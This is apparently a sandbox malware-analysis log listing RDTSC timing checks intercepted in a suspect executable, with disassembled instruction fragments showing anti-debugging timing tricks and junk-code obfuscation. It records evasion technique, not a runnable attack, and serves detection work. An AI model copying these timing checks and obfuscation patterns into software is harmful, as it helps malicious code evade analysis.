Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B65BE5 second address: B65BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B65BF0 second address: B65BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jc 00007FD0B5348056h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B65BFE second address: B65C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B67814 second address: B6781A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B6781A second address: B6781F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B6781F second address: B67848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD0B5348056h 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD0B5348065h 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B67848 second address: B6784F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B6784F second address: B6786C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0B5348069h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B679BD second address: B679DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007FD0B548337Ah 0x0000000b jmp 00007FD0B5483372h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B679DC second address: B679E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B679E2 second address: B679EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B679EE second address: B679FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jng 00007FD0B5348056h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B8114D second address: B81153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B81723 second address: B8174D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Ah 0x00000007 jmp 00007FD0B5348064h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jl 00007FD0B534805Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B85DB2 second address: B85DC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD0B548336Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B85FC2 second address: B85FC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B85FC6 second address: B8603D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FD0B5483378h 0x0000000e jno 00007FD0B5483368h 0x00000014 popad 0x00000015 nop 0x00000016 mov dword ptr [ebp+1244D2D8h], edi 0x0000001c push 00000004h 0x0000001e or dl, FFFFFFAFh 0x00000021 call 00007FD0B5483369h 0x00000026 pushad 0x00000027 je 00007FD0B548337Bh 0x0000002d jmp 00007FD0B5483375h 0x00000032 pushad 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 jmp 00007FD0B5483370h 0x0000003a popad 0x0000003b popad 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B8603D second address: B86041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B86041 second address: B86047 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B86047 second address: B86076 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD0B5348058h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f jnp 00007FD0B534805Ch 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 jc 00007FD0B5348056h 0x0000001e popad 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B86076 second address: B8607A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B8607A second address: B8608B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B87D90 second address: B87D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: B87D97 second address: B87DAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD0B534805Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 516019A second address: 51601A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5140EFA second address: 5140F6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0B534805Fh 0x00000009 sbb ax, 7F8Eh 0x0000000e jmp 00007FD0B5348069h 0x00000013 popfd 0x00000014 mov ax, 1A97h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d jmp 00007FD0B534805Ah 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FD0B534805Dh 0x0000002c add cl, 00000076h 0x0000002f jmp 00007FD0B5348061h 0x00000034 popfd 0x00000035 mov eax, 71C7A567h 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 519001C second address: 5190096 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B548336Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bl, al 0x0000000d pushfd 0x0000000e jmp 00007FD0B5483371h 0x00000013 xor si, 2646h 0x00000018 jmp 00007FD0B5483371h 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 jmp 00007FD0B5483377h 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 mov di, DE56h 0x0000002d movsx edx, ax 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FD0B5483375h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5190096 second address: 51900A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0B534805Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51900A6 second address: 51900BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD0B548336Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51900BB second address: 51900CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0B534805Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51900CD second address: 51900D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 512013D second address: 512015D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, B4h 0x00000005 mov ax, 5C97h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD0B534805Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 512015D second address: 512017A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483379h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 512017A second address: 5120180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5120180 second address: 5120184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5120184 second address: 51201A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD0B5348062h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51201A1 second address: 51201A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5140C7A second address: 5140CF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 movzx esi, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebp 0x0000000d pushad 0x0000000e mov ebx, ecx 0x00000010 jmp 00007FD0B5348060h 0x00000015 popad 0x00000016 mov dword ptr [esp], ebp 0x00000019 jmp 00007FD0B5348060h 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FD0B534805Eh 0x00000027 or cx, 3C08h 0x0000002c jmp 00007FD0B534805Bh 0x00000031 popfd 0x00000032 mov esi, 5E8B127Fh 0x00000037 popad 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c mov ecx, ebx 0x0000003e call 00007FD0B5348063h 0x00000043 pop ecx 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51407D7 second address: 51407DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51407DD second address: 51407E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51407E1 second address: 51407FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD0B548336Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51407FC second address: 514080B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5140641 second address: 5140670 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483371h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cl, C4h 0x0000000d movsx edx, ax 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD0B548336Dh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5140670 second address: 5140674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5140674 second address: 514067A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 514067A second address: 5140691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0B5348063h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5140691 second address: 5140706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483379h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD0B5483373h 0x00000015 or ch, FFFFFFFEh 0x00000018 jmp 00007FD0B5483379h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FD0B5483370h 0x00000024 adc ch, FFFFFFF8h 0x00000027 jmp 00007FD0B548336Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5140706 second address: 5140738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0B534805Fh 0x00000009 sbb cl, FFFFFFBEh 0x0000000c jmp 00007FD0B5348069h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5140738 second address: 5140797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 jmp 00007FD0B548336Ch 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FD0B548336Dh 0x00000018 sbb ax, EDA6h 0x0000001d jmp 00007FD0B5483371h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007FD0B5483370h 0x00000029 xor al, 00000048h 0x0000002c jmp 00007FD0B548336Bh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5140360 second address: 5140366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5140366 second address: 514036C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 514036C second address: 51403A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348068h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FD0B5348060h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51403A2 second address: 51403A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51403A6 second address: 51403C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348068h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51403C2 second address: 51403C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51403C8 second address: 51403CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51403CC second address: 51403E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD0B548336Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51403E4 second address: 5140401 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348069h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5140401 second address: 5140427 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483371h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD0B548336Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 515037D second address: 5150383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5150383 second address: 51503E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD0B5483378h 0x00000008 pushfd 0x00000009 jmp 00007FD0B5483372h 0x0000000e sub ah, FFFFFFC8h 0x00000011 jmp 00007FD0B548336Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c mov ecx, 0939125Bh 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007FD0B548336Dh 0x00000028 xchg eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD0B548336Dh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51503E9 second address: 5150419 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348061h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edi, 4B85541Eh 0x00000013 call 00007FD0B534805Fh 0x00000018 pop eax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5150419 second address: 515041F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 514057C second address: 51405AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD0B5348061h 0x00000008 mov bh, ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD0B5348065h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51405AF second address: 51405C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483371h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51405C4 second address: 51405C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51405C9 second address: 5140607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0B548336Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007FD0B548336Eh 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD0B5483377h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5160076 second address: 51600A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348063h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0B5348065h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51600A5 second address: 51600C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483371h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51600C1 second address: 51600C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51600C5 second address: 51600C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51600C9 second address: 51600CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51600CF second address: 51600D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51600D5 second address: 51600D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51806FD second address: 5180703 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5180703 second address: 518071C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov al, bl 0x0000000f mov cx, B105h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 518071C second address: 5180772 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FD0B5483378h 0x00000010 xchg eax, ebp 0x00000011 jmp 00007FD0B5483370h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FD0B548336Dh 0x00000021 jmp 00007FD0B548336Bh 0x00000026 popfd 0x00000027 mov ebx, ecx 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 5180772 second address: 51807E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD0B534805Bh 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f jmp 00007FD0B5348062h 0x00000014 mov dword ptr [esp], ecx 0x00000017 pushad 0x00000018 mov eax, ebx 0x0000001a popad 0x0000001b mov eax, dword ptr [76FB65FCh] 0x00000020 jmp 00007FD0B534805Fh 0x00000025 test eax, eax 0x00000027 pushad 0x00000028 mov dx, cx 0x0000002b mov eax, 01CC85D7h 0x00000030 popad 0x00000031 je 00007FD1270FB1FCh 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FD0B5348069h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51807E1 second address: 51807E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: 51807E7 second address: 51807EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
